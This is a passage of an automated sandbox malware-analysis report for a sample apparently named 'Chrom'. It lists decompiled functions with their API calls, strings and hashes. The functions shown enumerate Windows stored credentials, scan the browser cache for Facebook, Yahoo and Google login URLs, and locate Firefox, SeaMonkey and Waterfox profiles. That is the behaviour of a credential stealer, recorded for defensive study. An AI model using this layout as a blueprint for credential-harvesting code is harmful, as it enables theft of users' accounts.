                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                        • API String ID: 2804212203-2982631422
                                                                                                                                                        • Opcode ID: 75406685bfe0d89dce18ab7b181c133869bbbaf153b2901e2afcd098ecb234dd
                                                                                                                                                        • Instruction ID: afe11abc20e36003db74d94c549cded038fcd9f42a86337aeda0c7f756a0cb8d
                                                                                                                                                        • Opcode Fuzzy Hash: 75406685bfe0d89dce18ab7b181c133869bbbaf153b2901e2afcd098ecb234dd
                                                                                                                                                        • Instruction Fuzzy Hash: 72317671D0021A6ADF10EFA5CD459DEB7B8EF04344F11007BA518B7181DB38AE858F99
                                                                                                                                                        Function 0040154C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040D0D4: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040118B,?,?,?,?,000003FF), ref: 0040D0F2
                                                                                                                                                          • Part of subcall function 0040D0D4: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040D146
                                                                                                                                                          • Part of subcall function 0040D19E: _wcsicmp.MSVCRT ref: 0040D1D8
                                                                                                                                                        • memset.MSVCRT ref: 00401629
                                                                                                                                                        • memset.MSVCRT ref: 00401640
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0044F4CC,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040118B,?,?), ref: 0040165C
                                                                                                                                                        • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040118B,?,?,?,?,000003FF), ref: 0040168A
                                                                                                                                                        • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040118B), ref: 004016DF
                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040118B), ref: 004016F1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 115830560-3916222277
                                                                                                                                                        • Opcode ID: 7e45ffffa53bb3d467dffeaa5b689cd9de8a3ed8c2e362a8250a3e0956d8dcef
                                                                                                                                                        • Instruction ID: 6182344d234d3d85177f64ddd9228ac02bc8ade9e8908f776b6b681188bf9119
                                                                                                                                                        • Opcode Fuzzy Hash: 7e45ffffa53bb3d467dffeaa5b689cd9de8a3ed8c2e362a8250a3e0956d8dcef
                                                                                                                                                        • Instruction Fuzzy Hash: 1941E5B2D002196BDB10EBA5CC45ADFB7ADAF44304F05097BB509F7192DA389E48CB59
                                                                                                                                                        Function 00411FB2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00411FE9
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00002A8C), ref: 0041201F
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 0041205D
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 004120CF
                                                                                                                                                        • LoadIconW.USER32(00000000,00000065), ref: 004120D8
                                                                                                                                                        • wcscpy.MSVCRT ref: 004120ED
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                        • String ID: =E
                                                                                                                                                        • API String ID: 2791114272-2289002813
                                                                                                                                                        • Opcode ID: 6717c7504d51a5bbc073fb69a6a2eb538a62dbd8f8af7227683567ac2f89e9c8
                                                                                                                                                        • Instruction ID: aad15f6d1b3b0a24ca9589720555a1dcf89de37177915705ae93bfa8ddf3393c
                                                                                                                                                        • Opcode Fuzzy Hash: 6717c7504d51a5bbc073fb69a6a2eb538a62dbd8f8af7227683567ac2f89e9c8
                                                                                                                                                        • Instruction Fuzzy Hash: 26316BB19013498FDB30EF668C896CABBE8EF49314F10452FE90CCB241EBB946558B59
                                                                                                                                                        Function 0040CC16 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040B7D1: free.MSVCRT ref: 0040B7D4
                                                                                                                                                          • Part of subcall function 0040B7D1: free.MSVCRT ref: 0040B7DC
                                                                                                                                                          • Part of subcall function 0040B02A: free.MSVCRT ref: 0040B031
                                                                                                                                                          • Part of subcall function 0040C722: memset.MSVCRT ref: 0040C746
                                                                                                                                                          • Part of subcall function 0040C722: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C7BB
                                                                                                                                                          • Part of subcall function 0040C722: wcschr.MSVCRT ref: 0040C7D2
                                                                                                                                                          • Part of subcall function 0040C722: wcschr.MSVCRT ref: 0040C7F2
                                                                                                                                                          • Part of subcall function 0040C722: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C817
                                                                                                                                                          • Part of subcall function 0040C722: GetLastError.KERNEL32 ref: 0040C821
                                                                                                                                                          • Part of subcall function 0040C871: memset.MSVCRT ref: 0040C8E7
                                                                                                                                                          • Part of subcall function 0040C871: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C915
                                                                                                                                                          • Part of subcall function 0040C871: _wcsupr.MSVCRT ref: 0040C92F
                                                                                                                                                          • Part of subcall function 0040C871: memset.MSVCRT ref: 0040C97E
                                                                                                                                                          • Part of subcall function 0040C871: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C9A9
                                                                                                                                                        • _wcslwr.MSVCRT ref: 0040CCC5
                                                                                                                                                          • Part of subcall function 0040CAE2: wcslen.MSVCRT ref: 0040CB0D
                                                                                                                                                          • Part of subcall function 0040CAE2: memset.MSVCRT ref: 0040CB6D
                                                                                                                                                        • wcslen.MSVCRT ref: 0040CCDA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                        • API String ID: 2936932814-4196376884
                                                                                                                                                        • Opcode ID: 482f6134f7daacc017189fcee8ab3649d22c01fd56a7a6b5197cc4e451d6cae4
                                                                                                                                                        • Instruction ID: eace9bc4984dd9296d8cbd5f4ce7f45cb0460178c22a9edad4fb6917611d5c96
                                                                                                                                                        • Opcode Fuzzy Hash: 482f6134f7daacc017189fcee8ab3649d22c01fd56a7a6b5197cc4e451d6cae4
                                                                                                                                                        • Instruction Fuzzy Hash: 03217571600214A6CF10BF5ADC8589E7B68EF44344B20417BF804B7182D778DE85DA99
                                                                                                                                                        Function 0040AE2A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 784 40ae2a-40ae5f memset 785 40ae61-40ae6d GetSystemDirectoryW 784->785 786 40ae72-40aea5 wcscpy call 409cd8 wcscat LoadLibraryW 784->786 785->786 789 40aea7-40aeaa LoadLibraryW 786->789 790 40aeac-40aeae 786->790 789->790
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040AE4A
                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                        • wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                        • LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                        • String ID: C:\Windows\system32
                                                                                                                                                        • API String ID: 669240632-2896066436
                                                                                                                                                        • Opcode ID: 8a6edf88a0c2374f88dd8367b006526617f4906d0ebb873f97f1b08593d0deb6
                                                                                                                                                        • Instruction ID: 7b2e6449704ba0194f95f82772fbf49f9cd5c89e16ce75b46b49e10d3cb4640d
                                                                                                                                                        • Opcode Fuzzy Hash: 8a6edf88a0c2374f88dd8367b006526617f4906d0ebb873f97f1b08593d0deb6
                                                                                                                                                        • Instruction Fuzzy Hash: 65F0A471D41324A6EF107B61DC06B8B3B68AB00754F0144B2B908B3192EB78AE988FD9
                                                                                                                                                        Function 0040B8EC Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 791 40b8ec-40b90a call 4075c7 794 40b910-40b919 791->794 795 40ba9f-40baab call 407670 791->795 797 40b92a 794->797 798 40b91b-40b928 CredEnumerateW 794->798 800 40b92c-40b92e 797->800 798->800 800->795 801 40b934-40b954 call 406cd0 wcslen 800->801 804 40ba99 801->804 805 40b95a-40b95c 801->805 804->795 805->804 806 40b962-40b97e wcsncmp 805->806 807 40b984-40b9b3 call 40b899 call 407687 806->807 808 40ba8a-40ba93 806->808 807->808 813 40b9b9-40b9df memset 807->813 808->804 808->805 814 40b9e1 813->814 815 40b9e3-40ba26 memcpy 813->815 814->815 816 40ba28-40ba42 call 406cd0 _wcsnicmp 815->816 817 40ba4d-40ba69 wcschr 815->817 816->817 822 40ba44-40ba4a 816->822 818 40ba74-40ba84 LocalFree 817->818 819 40ba6b-40ba71 817->819 818->808 819->818 822->817
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 004075FC
                                                                                                                                                          • Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 00407610
                                                                                                                                                          • Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 00407623
                                                                                                                                                          • Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 00407637
                                                                                                                                                          • Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 0040764B
                                                                                                                                                        • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040B925
                                                                                                                                                        • wcslen.MSVCRT ref: 0040B942
                                                                                                                                                        • wcsncmp.MSVCRT ref: 0040B974
                                                                                                                                                        • memset.MSVCRT ref: 0040B9CD
                                                                                                                                                        • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040B9EE
                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 0040BA38
                                                                                                                                                        • wcschr.MSVCRT ref: 0040BA60
                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BA84
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 697348961-0
                                                                                                                                                        • Opcode ID: 93ecba6a689d5c320bdaef842fb6c50b4f1763f90038faa5d7af11543cd44ae8
                                                                                                                                                        • Instruction ID: fabfe86e697632e3a113e667da81389391c5e61e9c799e2ba2b38c502135d7e8
                                                                                                                                                        • Opcode Fuzzy Hash: 93ecba6a689d5c320bdaef842fb6c50b4f1763f90038faa5d7af11543cd44ae8
                                                                                                                                                        • Instruction Fuzzy Hash: 37510AB1E002099FDF20DFA5C8859AEBBF8EF48304F10452AE919F7251E735A945CF69
                                                                                                                                                        Function 0041303D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00413060
                                                                                                                                                        • memset.MSVCRT ref: 00413075
                                                                                                                                                        • memset.MSVCRT ref: 0041308A
                                                                                                                                                        • memset.MSVCRT ref: 0041309F
                                                                                                                                                        • memset.MSVCRT ref: 004130B4
                                                                                                                                                          • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                          • Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
                                                                                                                                                          • Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
                                                                                                                                                          • Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 00413513
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413577
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413588
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135A1
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135B6
                                                                                                                                                          • Part of subcall function 004134F0: _snwprintf.MSVCRT ref: 004135D0
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 004135E3
                                                                                                                                                        • memset.MSVCRT ref: 0041317B
                                                                                                                                                          • Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
                                                                                                                                                          • Part of subcall function 00409F85: memcpy.MSVCRT(?,?,000000FF,?,00446651,00000000,?,?,?,00000000,?), ref: 00409FA2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                        • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                        • API String ID: 4039892925-11920434
                                                                                                                                                        • Opcode ID: d5c71e77324afc4b5cc82ea4ce8339bfbd05d02e97acfa20c2f281ec6797be4d
                                                                                                                                                        • Instruction ID: 961380efd413e994d860ccb56e6665ca3f7b28eb71c2195a5a659fa08900d420
                                                                                                                                                        • Opcode Fuzzy Hash: d5c71e77324afc4b5cc82ea4ce8339bfbd05d02e97acfa20c2f281ec6797be4d
                                                                                                                                                        • Instruction Fuzzy Hash: C74144B294121CAADB20EB56CC81FCF777CAF85314F1144A7B508F2141EA745B88CF6A
                                                                                                                                                        Function 004131CE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 004131F1
                                                                                                                                                        • memset.MSVCRT ref: 00413206
                                                                                                                                                        • memset.MSVCRT ref: 0041321B
                                                                                                                                                        • memset.MSVCRT ref: 00413230
                                                                                                                                                        • memset.MSVCRT ref: 00413245
                                                                                                                                                          • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                          • Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
                                                                                                                                                          • Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
                                                                                                                                                          • Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 00413513
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413577
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413588
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135A1
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135B6
                                                                                                                                                          • Part of subcall function 004134F0: _snwprintf.MSVCRT ref: 004135D0
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 004135E3
                                                                                                                                                        • memset.MSVCRT ref: 0041330C
                                                                                                                                                          • Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
                                                                                                                                                          • Part of subcall function 00409F85: memcpy.MSVCRT(?,?,000000FF,?,00446651,00000000,?,?,?,00000000,?), ref: 00409FA2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                        • API String ID: 4039892925-2068335096
                                                                                                                                                        • Opcode ID: a6f98496c2212be6f2916d1f1e48eedc26af0efe673e4bd53c3bd508ed4be210
                                                                                                                                                        • Instruction ID: 891e70054f67f373fcd1da7e6bb8e88c65c93f586ac1dbd30abc510520fb583d
                                                                                                                                                        • Opcode Fuzzy Hash: a6f98496c2212be6f2916d1f1e48eedc26af0efe673e4bd53c3bd508ed4be210
                                                                                                                                                        • Instruction Fuzzy Hash: AF4142B294121CAADB20EB56CC81FCF777CAF85314F1144ABB509F2142EA745B84CF6A
                                                                                                                                                        Function 0041335F Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00413382
                                                                                                                                                        • memset.MSVCRT ref: 00413397
                                                                                                                                                        • memset.MSVCRT ref: 004133AC
                                                                                                                                                        • memset.MSVCRT ref: 004133C1
                                                                                                                                                        • memset.MSVCRT ref: 004133D6
                                                                                                                                                          • Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE
                                                                                                                                                          • Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
                                                                                                                                                          • Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
                                                                                                                                                          • Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 00413513
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413577
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413588
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135A1
                                                                                                                                                          • Part of subcall function 004134F0: memset.MSVCRT ref: 004135B6
                                                                                                                                                          • Part of subcall function 004134F0: _snwprintf.MSVCRT ref: 004135D0
                                                                                                                                                          • Part of subcall function 004134F0: wcscpy.MSVCRT ref: 004135E3
                                                                                                                                                        • memset.MSVCRT ref: 0041349D
                                                                                                                                                          • Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
                                                                                                                                                          • Part of subcall function 00409F85: memcpy.MSVCRT(?,?,000000FF,?,00446651,00000000,?,?,?,00000000,?), ref: 00409FA2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                        • API String ID: 4039892925-3369679110
                                                                                                                                                        • Opcode ID: 7ee771b16487d39b61153e4239614bb8b6a0fcb54c4a807fbe838d5fcbd2a04a
                                                                                                                                                        • Instruction ID: b1b9f3cced5a7470729646768e957e6b9d6e833cd164865aec5624d5e78815e5
                                                                                                                                                        • Opcode Fuzzy Hash: 7ee771b16487d39b61153e4239614bb8b6a0fcb54c4a807fbe838d5fcbd2a04a
